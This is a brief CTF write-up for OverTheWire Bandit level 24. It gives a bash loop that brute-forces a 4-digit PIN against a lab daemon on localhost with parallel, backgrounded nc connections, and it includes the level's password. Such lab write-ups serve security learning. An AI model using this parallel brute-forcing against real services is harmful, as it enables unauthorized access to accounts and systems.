Bandit Wargame Level24 Writeup(brute-forcing with shell)

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

像这种暴力破解的题目要注意运用“多线程”的思想(被破解对象/环境支持),不要等到返回的信息才开始下一个爆破。

1 #!/bin/bash
2 
3 for i in {1000..9999};
4 do
5     echo $i;
6     echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"|nc localhost 30002 >> 1.txt & #不要等待,直接放到后台去,服务器判错后会自动中断链接,所以资源不会耗得很大。
7 done

 

posted @ 2017-05-23 20:54  QiuhaoLi  阅读(264)  评论(0编辑  收藏  举报